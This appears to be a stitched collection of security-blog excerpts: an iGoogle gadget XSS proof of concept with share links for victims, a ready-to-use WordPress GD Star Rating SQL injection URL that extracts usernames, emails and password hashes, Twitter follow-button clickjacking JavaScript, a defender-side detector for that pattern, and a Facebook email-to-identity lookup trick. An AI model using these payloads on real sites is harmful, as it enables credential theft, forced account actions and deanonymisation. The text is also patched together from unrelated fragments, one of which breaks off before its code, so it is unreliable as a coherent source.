iGoogle is a service of Google. Its features include the capability to add web feeds to a personalized homepage. Google also allows any user to create a custom gadget.

  1. Write crafted gadget
  2. Submit crafted gadget
  3. Share it
  4. Exploit it!

Then, we go …

1. Write crafted gadget

I got the “Google News” gadget by downloading the following XML file:

http://www.gstatic.com/ig/modules/tabnews/kennedy/tabnews.xml

and added my <script> at the end, like this:

…
ud=K.getString(x),vd=K.getMsg(x),wd=/\.cn$/.test(location.host);wd||!ud||ud==vd?pd():sd(ud); window.updateCustomEdit=kd;window.saveConfig=td;window.hideSettingsBlock=jd;})()</script>
<script>alert(/XSS by @MaKyOtOx/);</script>
<div id=settings_mask onclick="return false;"></div>
<div id=settings_block>
<div id=settings_content></div>
</div>
</Content></Module>

 

2. Submit crafted gadget

I’ve uploaded my XML here: http://www.makyoto.fr/xss/poc.xml

Then, once I’ve customized my gadget, I’ve submitted it here: http://www.google.com/ig/submit

No error was found in the crafted XML file, so it’s OK: my poc.xml is ready to be used as a gadget ^^

 

3. Share it

This gadget is easy to share with friends using the official sharing features. The following links can be sent to the victim:

http://www.google.com/ig/adde?moduleurl=www.makyoto.fr/xss/poc.xml%253C&source=imag

or

http://www.google.com/ig/directory?type=gadgets&url=www.makyoto.fr/xss/poc.xml

 

If you choose to add my gadget, a widget will now be present in the iGoogle dashboard.

 

4. Exploit it!

You are bad guys …

 

Google Security Team answered me “the domain in which the feature is hosted – gmodules.com – is specifically meant as a compartmentalized « sandbox » for various types of potentially unsafe, user-controlled content. This domain is isolated from any sensitive content due to the same-origin policy.”

Yes, they’re right, because I cannot access the user’s auth cookies, but I can render and script whatever I want in the gadget … And what if an attacker could access the XML files of popular gadgets?

Nevertheless, I continue to believe that there is a vulnerability, because the XML file isn’t sufficiently sanitized before being processed.

 

Tweets are welcome @MaKyOtOx and @devquotes


Served as found on the interweb:

WordPress « wp star rating » plugin SQL injection

http://yourwordpress/wp-content/plugins/gd-star-rating/ajax.php?_wpnonce=<insert_valid_nonce>&vote_type=cache&vote_domain=a&votes=asr.1.xxx.1.2.5+limit+0+union+select+1,0x535242,1,1,concat(0x613a313a7b733a363a226e6f726d616c223b733a323030303a22,substring(concat((select+concat(user_nicename,0x3a,user_email,0x3a,user_login,0x3a,user_pass)+from+wp_users+where+length(user_pass)%3E0+order+by+id+limit+0,1),repeat(0x20,2000)),1,2000),0x223b7d),1,1,1+limit+1


A new follow button, which allows users to instantly follow a Twitter account, is now available. The particularity of this new button (like Google +1) is that the user doesn’t need to go to the Twitter.com website: everything is handled in an iframe.

A French pentester released a POC (proof of concept) of the vulnerability:

 

Here is how it works:

  • You set the iframe fully transparent/invisible via CSS.
  • You capture mouse events.
  • When the user moves the mouse, you move the Twitter button iframe so that it always stays under the cursor.
  • If the user clicks anywhere on your page, he will automatically follow your account.

 

Here is the code:

// Fallback for browsers without getElementsByClassName (e.g. IE7):
// returns an array holding the first element with that class name.
if (!document.getElementsByClassName){
        document.getElementsByClassName = function(classname){
                var all = document.getElementsByTagName("*");
                for (var i = 0; i < all.length; i++)
                {
                        if (all.item(i).className == classname){
                                return new Array(all.item(i));
                        }
                }
                return new Array();
        }
}

// Take the follow-button iframe out of the page flow and make it nearly transparent
// (opacity for standards browsers, the alpha filter for old IE); 0 would hide it completely.
var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)';

// Keep the iframe under the cursor so that any click lands on the follow button.
// Standards-mode browsers require the 'px' unit; a bare number is ignored there.
document.onmousemove = function(e){
        if ( !e ) e = window.event;
        twitterFollowIframe.style.left = (e.clientX - 20) + 'px';
        twitterFollowIframe.style.top = (e.clientY - 10) + 'px';
}

You can find the proof of concept at this page: http://serphacker.com/twitter-follow-clickjacking.html

 

The destination server is down at the moment; here is the POC source code with 20% opacity:


SERP Hacker

Tested on Firefox 3 and IE7
Just move the mouse and click somewhere: you will automatically follow my Twitter account if you are already logged in to Twitter. Remember, we can make the button totally hidden by setting opacity to 0.
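As an added example (not code from the original post nor from SERP Hacker), here is a defender-side heuristic that flags the pattern described above: a near-transparent, absolutely positioned iframe that keeps tracking the cursor. It audits a constructed snapshot with placeholder URLs; in a crawler or browser extension the snapshot would be filled from getComputedStyle() and sampled mousemove events.

```javascript
// Added example, not from the original post: flags the "transparent iframe dragged under
// the cursor" pattern over a constructed snapshot (live code would sample the real DOM).

// Effective opacity from CSS `opacity`, else IE's `filter: alpha(opacity=N)`, else 1.
function effectiveOpacity(style) {
  const v = parseFloat(style.opacity);
  if (!Number.isNaN(v)) return v;
  const m = /alpha\(opacity=(\d+)\)/i.exec(style.filter || '');
  return m ? parseInt(m[1], 10) / 100 : 1;
}

// True when the iframe's top-left corner stayed within `tolerance` px of the cursor
// in every sample, i.e. it was moved along with the mouse (needs at least 3 samples).
function followsCursor(samples, tolerance) {
  if (!samples || samples.length < 3) return false;
  return samples.every((s) =>
    Math.abs(s.frame.left - s.mouse.x) <= tolerance &&
    Math.abs(s.frame.top - s.mouse.y) <= tolerance);
}

// Report iframes showing at least two of the three traits of the PoC.
function auditIframes(snapshot) {
  const findings = [];
  for (const frame of snapshot.iframes) {
    const reasons = [];
    const opacity = effectiveOpacity(frame.style);
    if (opacity < 0.5) reasons.push('near-transparent (opacity ' + opacity + ')');
    if (frame.style.position === 'absolute' || frame.style.position === 'fixed') {
      reasons.push('positioned out of the page flow');
    }
    if (followsCursor(frame.samples, 40)) reasons.push('tracks the cursor');
    if (reasons.length >= 2) findings.push({ src: frame.src, reasons });
  }
  return findings;
}

// Constructed snapshot with placeholder URLs: the cursor path is shared; the first
// iframe follows it at the PoC's (-20, -10) offset, the second stays where it is.
const CURSOR_PATH = [[100, 200], [350, 120], [610, 480]];
const SAMPLE_SNAPSHOT = {
  iframes: [
    { src: 'https://social.example/follow-button',
      style: { position: 'absolute', opacity: '0.2', filter: 'alpha(opacity=20)' },
      samples: CURSOR_PATH.map(([x, y]) => ({ mouse: { x, y }, frame: { left: x - 20, top: y - 10 } })) },
    { src: 'https://video.example/embed/42',
      style: { position: 'static', opacity: '1' },
      samples: CURSOR_PATH.map(([x, y]) => ({ mouse: { x, y }, frame: { left: 300, top: 600 } })) },
  ],
};
```

Calling auditIframes(SAMPLE_SNAPSHOT) reports only the first iframe, with all three reasons; the thresholds (opacity below 0.5, 40 px tolerance) are tunable assumptions.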

Hi,

You may have heard about a recent security hole in facebook.com (you know, the #2 website in the Alexa rankings). The pages of French president Nicolas Sarkozy and Facebook CEO Mark Zuckerberg were recently hijacked.

How it works: hackers used a cross-site scripting (XSS) vulnerability to steal cookies.



Blacklist

In most network applications, managing incoming traffic is important, and quite hard to set up. If your algorithm is too restrictive, you will drop too many connections; if it’s too permissive, you will accept undesired connections. The real need is to tell your application: « Accept N connection(s) in an X second(s) time range ».

Concept

The way to decide whether a connection has to be dropped or not is to look at a history of the last X second(s), count how many connection(s) from that IP have been made, and decide from that count. This is the « simple » algorithm that does that:



Today I’ve got a little vuln for you. Nothing critical, but a privacy hole in Facebook. Nice, isn’t it? We’re dealing with Facebook privacy, and that’s why this is important. This trick will allow you to know who’s behind any email address.

You want to know the name of the person who’s behind [email protected]. It seems quite hard to find anything related to this email. You can at least try to use Google or the most common reverse identity websites:

But let’s think: most people are now on Facebook, so let’s give it a try. Not using the search function of Facebook, but using the reverse lookup implemented in the password reset page.

